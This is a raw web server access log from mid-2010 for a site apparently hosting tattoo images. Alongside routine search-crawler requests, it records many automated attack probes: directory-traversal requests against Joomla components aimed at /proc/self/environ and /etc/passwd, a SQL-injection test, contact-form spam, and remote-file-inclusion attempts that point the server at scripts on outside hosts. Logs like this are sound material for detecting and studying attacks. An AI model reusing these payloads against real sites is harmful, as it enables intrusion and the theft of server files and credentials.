74.86.75.179 - - [30/Jun/2010:23:20:33 -0500] "GET /logs/access_log.1277164800//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.86.75.179 - - [30/Jun/2010:23:20:33 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.86.75.179 - - [30/Jun/2010:23:20:34 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.86.75.179 - - [30/Jun/2010:23:20:37 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
94.23.215.207 - - [30/Jun/2010:23:20:53 -0500] "GET /logs/access_log.1277164800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
94.23.215.207 - - [30/Jun/2010:23:20:53 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.215.207 - - [30/Jun/2010:23:20:53 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.803"
66.249.71.185 - - [30/Jun/2010:23:21:55 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "-""Googlebot-Image/1.0"
66.249.71.185 - - [30/Jun/2010:23:21:56 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "-""Googlebot-Image/1.0"
74.86.75.179 - - [30/Jun/2010:23:21:57 -0500] "GET /logs/access_log.1277164800//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.86.75.179 - - [30/Jun/2010:23:21:57 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.86.75.179 - - [30/Jun/2010:23:21:57 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.86.75.179 - - [30/Jun/2010:23:21:58 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
62.77.128.219 - - [30/Jun/2010:23:22:17 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
74.86.75.179 - - [30/Jun/2010:23:22:47 -0500] "GET /logs/access_log.1277164800//index.php?option=com_myblog&blogger=stafi&Itemid=133' HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.86.75.179 - - [30/Jun/2010:23:22:48 -0500] "GET //index.php?option=com_myblog&blogger=stafi&Itemid=133' HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.86.75.179 - - [30/Jun/2010:23:22:48 -0500] "GET /logs//index.php?option=com_myblog&blogger=stafi&Itemid=133' HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.86.75.179 - - [30/Jun/2010:23:22:51 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&blogger=stafi&Itemid=133' HTTP/1.1" 404 321 "-""libwww-perl/5.834"
66.249.71.185 - - [30/Jun/2010:23:24:27 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "-""Googlebot-Image/1.0"
66.165.35.16 - - [30/Jun/2010:23:24:48 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:23:24:48 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:23:24:48 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:23:24:48 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:23:24:48 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:23:24:48 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:23:24:48 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:23:24:48 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:23:24:49 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:23:24:49 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:23:24:49 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:23:24:49 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:23:24:49 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:23:24:49 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:23:24:49 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:23:24:49 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:23:24:49 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
66.165.35.16 - - [30/Jun/2010:23:24:49 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.23.215.207 - - [30/Jun/2010:23:25:06 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
94.23.215.207 - - [30/Jun/2010:23:25:07 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.215.207 - - [30/Jun/2010:23:25:07 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.803"
94.23.215.207 - - [30/Jun/2010:23:25:42 -0500] "GET /logs/access_log.1276819200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
94.23.215.207 - - [30/Jun/2010:23:27:18 -0500] "GET /logs/access_log.1275868800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
66.249.71.185 - - [30/Jun/2010:23:27:53 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "-""Googlebot-Image/1.0"
67.195.112.180 - - [30/Jun/2010:23:29:59 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 304 - "http://o.webring.org/hub?ring=tattoos;id=100;prvw""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.185 - - [30/Jun/2010:23:31:19 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "-""Googlebot-Image/1.0"
66.249.71.185 - - [30/Jun/2010:23:34:45 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "-""Googlebot-Image/1.0"
67.195.112.180 - - [30/Jun/2010:23:35:04 -0500] "GET /logs/access_log.1195776000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.185 - - [30/Jun/2010:23:38:11 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "-""Googlebot-Image/1.0"
119.73.183.190 - - [30/Jun/2010:23:38:38 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
119.73.183.190 - - [30/Jun/2010:23:38:38 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
119.73.183.190 - - [30/Jun/2010:23:38:38 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
119.73.183.190 - - [30/Jun/2010:23:38:44 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
119.73.183.190 - - [30/Jun/2010:23:38:44 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
67.195.112.180 - - [30/Jun/2010:23:40:34 -0500] "GET /logs/access_log.1191974400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.52.48.66 - - [30/Jun/2010:23:40:39 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.52.48.66 - - [30/Jun/2010:23:40:39 -0500] "GET /logs/access_log.1266710400%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.52.48.66 - - [30/Jun/2010:23:40:39 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
207.46.199.184 - - [30/Jun/2010:23:40:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.52.48.66 - - [30/Jun/2010:23:41:27 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.52.48.66 - - [30/Jun/2010:23:41:27 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
74.52.48.66 - - [30/Jun/2010:23:41:27 -0500] "GET /logs/access_log.1266710400//admin/classes/TplLoad.php?full_path_to_public_program=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.249.71.185 - - [30/Jun/2010:23:41:37 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "-""Googlebot-Image/1.0"
62.77.128.219 - - [30/Jun/2010:23:43:03 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
62.77.128.219 - - [30/Jun/2010:23:43:06 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
62.77.128.219 - - [30/Jun/2010:23:43:12 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.808"
119.73.183.190 - - [30/Jun/2010:23:44:56 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
119.73.183.190 - - [30/Jun/2010:23:44:58 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
119.73.183.190 - - [30/Jun/2010:23:44:59 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
119.73.183.190 - - [30/Jun/2010:23:45:02 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
66.249.71.185 - - [30/Jun/2010:23:45:03 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "-""Googlebot-Image/1.0"
119.73.183.190 - - [30/Jun/2010:23:45:06 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
66.249.71.185 - - [30/Jun/2010:23:45:47 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.185 - - [30/Jun/2010:23:48:30 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "-""Googlebot-Image/1.0"
62.77.128.219 - - [30/Jun/2010:23:49:01 -0500] "GET /logs/access_log.1275868800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
66.249.71.185 - - [30/Jun/2010:23:51:56 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "-""Googlebot-Image/1.0"
66.249.71.185 - - [30/Jun/2010:23:51:57 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "-""Googlebot-Image/1.0"
66.249.71.185 - - [30/Jun/2010:23:51:57 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "-""Googlebot-Image/1.0"
66.249.71.185 - - [30/Jun/2010:23:51:58 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "-""Googlebot-Image/1.0"
202.146.215.116 - - [30/Jun/2010:23:53:15 -0500] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
74.52.48.66 - - [30/Jun/2010:23:54:02 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
74.52.48.66 - - [30/Jun/2010:23:54:02 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
74.52.48.66 - - [30/Jun/2010:23:54:02 -0500] "GET /logs/access_log.1274572800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 378 "-""Mozilla/5.0"
66.249.71.185 - - [30/Jun/2010:23:55:52 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "-""Googlebot-Image/1.0"
94.124.120.73 - - [30/Jun/2010:23:56:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:56:05 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:56:05 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:56:06 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:56:06 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:56:06 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:56:06 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:56:06 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:56:06 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:56:07 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:56:07 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:56:07 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:56:07 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:56:07 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:56:07 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:56:08 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:56:08 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.73 - - [30/Jun/2010:23:56:08 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.201.253.2 - - [30/Jun/2010:23:58:35 -0500] "GET /logs/access_log.1277164800//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
194.201.253.2 - - [30/Jun/2010:23:58:35 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
194.201.253.2 - - [30/Jun/2010:23:58:36 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
194.201.253.2 - - [30/Jun/2010:23:58:37 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.52.48.66 - - [30/Jun/2010:23:58:42 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
74.52.48.66 - - [30/Jun/2010:23:58:42 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
74.52.48.66 - - [30/Jun/2010:23:58:42 -0500] "GET /logs/access_log.1274572800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 378 "-""Mozilla/5.0"
66.191.139.210 - - [30/Jun/2010:23:59:32 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
66.191.139.210 - - [30/Jun/2010:23:59:32 -0500] "GET /logs/access_log.1274572800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
66.191.139.210 - - [30/Jun/2010:23:59:32 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
66.191.139.210 - - [30/Jun/2010:23:59:46 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
66.191.139.210 - - [30/Jun/2010:23:59:46 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
66.191.139.210 - - [30/Jun/2010:23:59:46 -0500] "GET /logs/access_log.1274572800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
87.238.172.21 - - [01/Jul/2010:00:00:04 -0500] "GET /logs/access_log.1274572800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
87.238.172.21 - - [01/Jul/2010:00:00:04 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
87.238.172.21 - - [01/Jul/2010:00:00:04 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
66.249.71.185 - - [01/Jul/2010:00:00:12 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "-""Googlebot-Image/1.0"
66.249.71.185 - - [01/Jul/2010:00:04:32 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "-""Googlebot-Image/1.0"
207.46.204.14 - - [01/Jul/2010:00:05:30 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.204.14 - - [01/Jul/2010:00:05:30 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [01/Jul/2010:00:06:06 -0500] "GET /logs/access_log.1271203200 HTTP/1.0" 200 497444 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.185 - - [01/Jul/2010:00:08:53 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "-""Googlebot-Image/1.0"
89.212.6.4 - - [01/Jul/2010:00:08:54 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:08:54 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:08:54 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:08:54 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:08:54 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:08:54 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:08:55 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:08:55 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:08:55 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:08:55 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:08:55 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:08:55 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:08:55 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:08:55 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:08:55 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:08:56 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:08:56 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:08:56 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
66.249.71.185 - - [01/Jul/2010:00:13:14 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "-""Googlebot-Image/1.0"
66.249.71.185 - - [01/Jul/2010:00:17:34 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "-""Googlebot-Image/1.0"
208.115.111.248 - - [01/Jul/2010:00:19:10 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
202.146.215.116 - - [01/Jul/2010:00:19:13 -0500] "GET /logs/access_log.1277078400/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
202.146.215.116 - - [01/Jul/2010:00:19:13 -0500] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
202.146.215.116 - - [01/Jul/2010:00:19:14 -0500] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
140.128.174.15 - - [01/Jul/2010:00:19:16 -0500] "GET /logs/access_log.1275091200//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
140.128.174.15 - - [01/Jul/2010:00:19:16 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
140.128.174.15 - - [01/Jul/2010:00:19:17 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
140.128.174.15 - - [01/Jul/2010:00:19:25 -0500] "GET /logs/access_log.1276732800//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
